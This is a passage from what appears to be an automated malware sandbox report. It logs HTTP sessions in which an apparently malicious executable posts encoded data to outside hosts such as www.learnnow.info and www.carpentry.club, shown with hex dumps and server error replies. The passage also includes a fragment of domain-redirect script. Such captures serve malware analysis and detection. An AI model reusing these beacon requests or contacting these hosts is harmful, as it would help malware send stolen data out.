                                                                        Data Ascii: un24.top", "https://0dyos.com");mappings.set("lingdianyun26.top", "https://0dyos.com");mappings.set("www.0dyvs.top", "https://0dyos.com");mappings.set("www.lingdianyun20.top", "https://0dyos.com");mappings.set("www.lingdianyun1
                                                                        Nov 28, 2024 09:16:03.759928942 CET224INData Raw: 67 73 2e 73 65 74 28 22 30 64 79 65 73 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 6c 69 6e 67 64 69 61 6e 79 75 6e 37 2e 78 79 7a 22 2c 20 22 68 74 74
                                                                        Data Ascii: gs.set("0dyes.xyz", "https://0dyos.com");mappings.set("lingdianyun7.xyz", "https://0dyos.com");mappings.set("www.lingdianyun07.top", "https://0dyos.com");mappings.set("www.vdoos.com", "https://0dyos.com");map
                                                                        Nov 28, 2024 09:16:03.880698919 CET1236INData Raw: 70 69 6e 67 73 2e 73 65 74 28 22 30 30 64 69 61 6e 79 75 6e 31 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 6c 69 6e 67 64 69 61 6e 79 75 6e 31 37 2e 74
                                                                        Data Ascii: pings.set("00dianyun1.xyz", "https://0dyos.com");mappings.set("lingdianyun17.top", "https://0dyos.com");mappings.set("www.lingdianyun15.top", "https://0dyos.com");mappings.set("lingdianyun9.xyz", "https://0dyos.com");mappings.s


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        33192.168.2.550015199.192.23.123802848C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 28, 2024 09:16:09.778213978 CET799OUTPOST /d5up/ HTTP/1.1
                                                                        Host: www.learnnow.info
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Accept-Encoding: gzip, deflate
                                                                        Connection: close
                                                                        Content-Length: 208
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Origin: http://www.learnnow.info
                                                                        Referer: http://www.learnnow.info/d5up/
                                                                        User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                        Data Raw: 51 68 4b 78 68 4e 50 3d 67 36 45 6d 44 72 78 4f 55 4c 57 71 70 6e 75 42 52 75 37 35 71 34 67 75 45 4d 66 6a 33 70 41 47 69 43 4b 45 64 6c 57 37 39 68 4d 52 4e 4a 41 44 34 62 63 4e 52 5a 7a 35 76 55 63 41 49 43 4a 4d 59 4b 64 6e 37 74 32 51 77 6f 34 70 75 2f 2f 34 72 32 44 6a 37 7a 34 35 5a 35 42 52 2b 2b 41 57 45 63 35 54 69 34 69 6e 51 56 63 72 70 76 31 70 73 4d 31 35 74 71 44 63 31 73 66 62 65 36 4e 4d 56 72 31 55 71 4d 7a 4d 69 51 47 66 49 6d 64 30 57 54 6b 4b 6c 62 54 64 30 4c 7a 6e 7a 57 43 71 2f 44 7a 53 6d 73 39 76 72 48 52 4f 38 58 36 4e 46 74 77 78 58 64 55 6d 30 71 6a 36 67 77 44 76 33 33 73 70 39 4c 59 3d
                                                                        Data Ascii: QhKxhNP=g6EmDrxOULWqpnuBRu75q4guEMfj3pAGiCKEdlW79hMRNJAD4bcNRZz5vUcAICJMYKdn7t2Qwo4pu//4r2Dj7z45Z5BR++AWEc5Ti4inQVcrpv1psM15tqDc1sfbe6NMVr1UqMzMiQGfImd0WTkKlbTd0LznzWCq/DzSms9vrHRO8X6NFtwxXdUm0qj6gwDv33sp9LY=
                                                                        Nov 28, 2024 09:16:11.036739111 CET533INHTTP/1.1 404 Not Found
                                                                        Date: Thu, 28 Nov 2024 08:16:10 GMT
                                                                        Server: Apache
                                                                        Content-Length: 389
                                                                        Connection: close
                                                                        Content-Type: text/html
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        34192.168.2.550016199.192.23.123802848C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 28, 2024 09:16:12.448820114 CET819OUTPOST /d5up/ HTTP/1.1
                                                                        Host: www.learnnow.info
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Accept-Encoding: gzip, deflate
                                                                        Connection: close
                                                                        Content-Length: 228
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Origin: http://www.learnnow.info
                                                                        Referer: http://www.learnnow.info/d5up/
                                                                        User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                        Data Raw: 51 68 4b 78 68 4e 50 3d 67 36 45 6d 44 72 78 4f 55 4c 57 71 71 48 2b 42 64 76 37 35 72 59 67 74 64 73 66 6a 35 4a 41 43 69 43 47 45 64 6b 69 4e 36 58 6b 52 4e 6f 77 44 2f 65 6f 4e 57 5a 7a 35 67 45 64 4b 56 53 4a 62 59 4b 51 53 37 6f 57 51 77 6f 73 70 75 38 72 34 72 6c 37 67 71 7a 34 2f 53 5a 42 54 36 2b 41 57 45 63 35 54 69 38 79 65 51 56 45 72 31 50 46 70 76 74 31 36 6b 4b 44 62 6a 38 66 62 4e 71 4e 49 56 72 31 32 71 4e 65 62 69 53 2b 66 49 69 5a 30 58 43 6b 46 38 4c 54 54 36 72 7a 31 38 6a 66 38 6d 53 4c 74 75 2b 38 41 32 6d 4e 54 77 42 4c 6e 66 50 34 5a 45 39 34 65 6b 35 72 4e 78 41 69 47 74 55 38 5a 6a 63 4f 4a 78 64 41 46 47 72 65 47 73 61 54 59 63 57 38 45 38 51 4e 6a
                                                                        Data Ascii: QhKxhNP=g6EmDrxOULWqqH+Bdv75rYgtdsfj5JACiCGEdkiN6XkRNowD/eoNWZz5gEdKVSJbYKQS7oWQwospu8r4rl7gqz4/SZBT6+AWEc5Ti8yeQVEr1PFpvt16kKDbj8fbNqNIVr12qNebiS+fIiZ0XCkF8LTT6rz18jf8mSLtu+8A2mNTwBLnfP4ZE94ek5rNxAiGtU8ZjcOJxdAFGreGsaTYcW8E8QNj
                                                                        Nov 28, 2024 09:16:13.712052107 CET533INHTTP/1.1 404 Not Found
                                                                        Date: Thu, 28 Nov 2024 08:16:13 GMT
                                                                        Server: Apache
                                                                        Content-Length: 389
                                                                        Connection: close
                                                                        Content-Type: text/html
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        35192.168.2.550017199.192.23.123802848C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 28, 2024 09:16:15.108933926 CET1836OUTPOST /d5up/ HTTP/1.1
                                                                        Host: www.learnnow.info
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Accept-Encoding: gzip, deflate
                                                                        Connection: close
                                                                        Content-Length: 1244
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Origin: http://www.learnnow.info
                                                                        Referer: http://www.learnnow.info/d5up/
                                                                        User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                        Data Raw: 51 68 4b 78 68 4e 50 3d 67 36 45 6d 44 72 78 4f 55 4c 57 71 71 48 2b 42 64 76 37 35 72 59 67 74 64 73 66 6a 35 4a 41 43 69 43 47 45 64 6b 69 4e 36 58 73 52 4b 61 34 44 35 35 45 4e 58 5a 7a 35 6a 45 64 4a 56 53 4a 61 59 4b 59 65 37 6f 62 6e 77 72 55 70 76 63 33 34 38 6b 37 67 7a 6a 34 2f 64 35 42 65 2b 2b 41 48 45 64 4a 58 69 34 57 65 51 56 45 72 31 4e 64 70 34 73 31 36 69 4b 44 63 31 73 66 74 65 36 4e 6b 56 72 4d 42 71 4e 71 4c 69 69 65 66 49 43 4a 30 56 77 4d 46 6a 62 53 31 39 72 79 6d 38 6a 61 69 6d 54 6d 63 75 2f 49 35 32 68 68 54 30 6c 75 75 47 63 49 6d 62 4c 67 48 32 4f 75 30 78 67 2b 57 76 33 51 64 69 4d 53 77 39 38 45 6f 57 72 32 43 70 70 79 48 66 7a 77 69 73 57 59 71 4e 49 50 4c 54 50 4b 55 48 76 4e 63 6d 51 54 56 5a 72 7a 4a 2b 45 76 6e 36 68 70 6d 54 4c 6b 56 58 33 4a 4d 66 30 76 59 53 54 6b 63 50 35 35 51 76 6d 66 75 2b 51 54 5a 52 48 48 4c 79 4b 50 75 6f 4b 33 4b 55 74 4e 45 59 36 64 54 5a 4b 35 51 71 79 34 70 66 49 67 76 71 42 2f 69 67 55 7a 58 57 48 7a 6e 6e 38 50 32 64 57 70 54 66 70 [TRUNCATED]
                                                                        Data Ascii: QhKxhNP=g6EmDrxOULWqqH+Bdv75rYgtdsfj5JACiCGEdkiN6XsRKa4D55ENXZz5jEdJVSJaYKYe7obnwrUpvc348k7gzj4/d5Be++AHEdJXi4WeQVEr1Ndp4s16iKDc1sfte6NkVrMBqNqLiiefICJ0VwMFjbS19rym8jaimTmcu/I52hhT0luuGcImbLgH2Ou0xg+Wv3QdiMSw98EoWr2CppyHfzwisWYqNIPLTPKUHvNcmQTVZrzJ+Evn6hpmTLkVX3JMf0vYSTkcP55Qvmfu+QTZRHHLyKPuoK3KUtNEY6dTZK5Qqy4pfIgvqB/igUzXWHznn8P2dWpTfpZeVOadfFQWeE404pVH4GKzbnG1m+WZYs+0TwRTOSht0LmjW3rL+knBCY432zUU/Dy1DLcBhRVkMoJqz1pbOPScGnyHsmTuhqW6EAKgZvz0tL7eYatIjyQzuWi91V6LIERdu6vqGwsJ4quhxgIV93x1wvKZ/Np2IiqS1RTCq/aCSOYRxCL3DiRBlG7anGYomvKfvW/c7XahSeRVZbE3gkvEDlDplJSc7a/vbBXC4mZPp2Sav3oOdMQ7O1Lu577FS8NiZV13rXp+dV44TAbtIaSMNSbOQheDGUo0XzjRGq0pAxppZlxNcQE1CFPffoKNyMiHo4GJmA6/apa6vLRDWXm8lGFstjnI2AP6qmCzYD92EZ3lQ8X7vEQlQIe46kswgzPDIr2ktsJD0zqhCB6pxHQbM87t5nxZ34FyswUj64lh9Uio05OaWMp2bf17rU99QZ32P7cI53n/oQrq//Gcn10cfsFhPWP1o2rPzguphQUvQDUBhlXx7Lha4ChMkmOr5eqNcuKAvMbKq3sTzWBDBQFWMq91kVlJyoPg7sEK3LTw6x5Gahd+1nz/du+QMLNAWPTe8lWdGuL9Slv9mvo1BWjBOP/y38edduBPVu43uYCAtan3LKRHcR5T55QCqZLJ0SE4bd/Nyx3L6fx7OOahVGduxwDwe4lF8nQY [TRUNCATED]
                                                                        Nov 28, 2024 09:16:16.455202103 CET533INHTTP/1.1 404 Not Found
                                                                        Date: Thu, 28 Nov 2024 08:16:16 GMT
                                                                        Server: Apache
                                                                        Content-Length: 389
                                                                        Connection: close
                                                                        Content-Type: text/html
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        36192.168.2.550018199.192.23.123802848C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 28, 2024 09:16:17.776678085 CET543OUTGET /d5up/?QhKxhNP=t4sGAbB2VavWqiiIadPUj68mTJ7Q54MapR6mUVHY3SwgNZVHyOwsTaauiAAffAhHdKJKrrjT+NERuNHfq0vx0hlOGr9kxI5wEfZ1g7ObOVlc/eoN6Msnk6zs6578MLwdAQ==&Yby=d2ydCtHpb8 HTTP/1.1
                                                                        Host: www.learnnow.info
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                        Nov 28, 2024 09:16:19.104046106 CET548INHTTP/1.1 404 Not Found
                                                                        Date: Thu, 28 Nov 2024 08:16:18 GMT
                                                                        Server: Apache
                                                                        Content-Length: 389
                                                                        Connection: close
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        37192.168.2.55001952.60.87.163802848C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 28, 2024 09:16:24.896471024 CET802OUTPOST /jcsf/ HTTP/1.1
                                                                        Host: www.carpentry.club
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Accept-Encoding: gzip, deflate
                                                                        Connection: close
                                                                        Content-Length: 208
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Origin: http://www.carpentry.club
                                                                        Referer: http://www.carpentry.club/jcsf/
                                                                        User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                        Data Raw: 51 68 4b 78 68 4e 50 3d 41 4c 67 75 72 55 47 47 6d 4d 44 58 47 77 46 6c 50 76 38 74 79 6f 58 31 45 6e 6b 70 79 51 59 58 74 4f 68 4b 50 46 55 39 2b 59 4b 51 76 44 57 78 63 46 52 43 43 71 69 2b 77 37 4d 6e 45 70 76 61 44 33 37 38 50 76 36 66 45 79 6b 74 72 67 61 71 74 47 4e 75 6c 4f 65 6d 4d 74 4b 51 45 70 77 7a 69 68 4b 44 4e 68 76 52 77 2b 61 34 66 6d 6b 52 41 44 61 65 63 47 7a 79 51 69 32 4b 78 72 42 4d 5a 32 4d 56 46 2f 4d 39 52 66 4e 63 4f 36 64 42 6a 56 34 53 77 36 64 4a 54 55 68 70 64 33 4b 33 33 72 66 6a 4c 6c 36 42 32 72 35 4d 77 52 7a 62 72 4d 72 51 41 62 37 64 76 4a 55 4c 6e 4f 55 30 4b 68 66 79 50 48 51 3d
                                                                        Data Ascii: QhKxhNP=ALgurUGGmMDXGwFlPv8tyoX1EnkpyQYXtOhKPFU9+YKQvDWxcFRCCqi+w7MnEpvaD378Pv6fEyktrgaqtGNulOemMtKQEpwzihKDNhvRw+a4fmkRADaecGzyQi2KxrBMZ2MVF/M9RfNcO6dBjV4Sw6dJTUhpd3K33rfjLl6B2r5MwRzbrMrQAb7dvJULnOU0KhfyPHQ=
                                                                        Nov 28, 2024 09:16:26.085532904 CET295INHTTP/1.1 405 Not Allowed
                                                                        Server: nginx
                                                                        Date: Thu, 28 Nov 2024 08:16:25 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 150
                                                                        Connection: close
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        38192.168.2.55002052.60.87.163802848C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 28, 2024 09:16:27.565336943 CET822OUTPOST /jcsf/ HTTP/1.1
                                                                        Host: www.carpentry.club
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Accept-Encoding: gzip, deflate
                                                                        Connection: close
                                                                        Content-Length: 228
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Origin: http://www.carpentry.club
                                                                        Referer: http://www.carpentry.club/jcsf/
                                                                        User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                        Data Raw: 51 68 4b 78 68 4e 50 3d 41 4c 67 75 72 55 47 47 6d 4d 44 58 48 52 56 6c 4a 49 41 74 30 49 58 79 61 33 6b 70 6e 41 59 54 74 4f 74 4b 50 45 51 74 2b 75 79 51 73 69 6d 78 64 45 52 43 42 71 69 2b 37 62 4e 6a 41 70 76 52 44 33 48 72 50 74 75 66 45 79 67 74 72 69 53 71 71 33 4e 70 71 2b 65 6b 41 4e 4b 65 4a 4a 77 7a 69 68 4b 44 4e 68 72 2f 77 2b 79 34 65 56 38 52 42 69 61 64 43 32 7a 31 61 43 32 4b 36 4c 41 6b 5a 32 4e 41 46 2b 51 54 52 64 6c 63 4f 2b 52 42 6d 52 73 54 2b 36 64 44 5a 30 67 48 56 43 72 6b 33 4c 62 79 50 6b 69 43 68 61 78 70 38 48 43 78 78 75 6a 34 54 37 58 6c 2f 61 63 38 32 2b 31 64 51 43 50 43 52 51 45 42 51 41 6a 55 6c 50 68 34 69 6b 53 6b 67 5a 5a 36 57 54 64 66
                                                                        Data Ascii: QhKxhNP=ALgurUGGmMDXHRVlJIAt0IXya3kpnAYTtOtKPEQt+uyQsimxdERCBqi+7bNjApvRD3HrPtufEygtriSqq3Npq+ekANKeJJwzihKDNhr/w+y4eV8RBiadC2z1aC2K6LAkZ2NAF+QTRdlcO+RBmRsT+6dDZ0gHVCrk3LbyPkiChaxp8HCxxuj4T7Xl/ac82+1dQCPCRQEBQAjUlPh4ikSkgZZ6WTdf
                                                                        Nov 28, 2024 09:16:28.752336025 CET295INHTTP/1.1 405 Not Allowed
                                                                        Server: nginx
                                                                        Date: Thu, 28 Nov 2024 08:16:28 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 150
                                                                        Connection: close
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        39192.168.2.55002152.60.87.163802848C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 28, 2024 09:16:30.232676029 CET1839OUTPOST /jcsf/ HTTP/1.1
                                                                        Host: www.carpentry.club
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Accept-Encoding: gzip, deflate
                                                                        Connection: close
                                                                        Content-Length: 1244
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Origin: http://www.carpentry.club
                                                                        Referer: http://www.carpentry.club/jcsf/
                                                                        User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
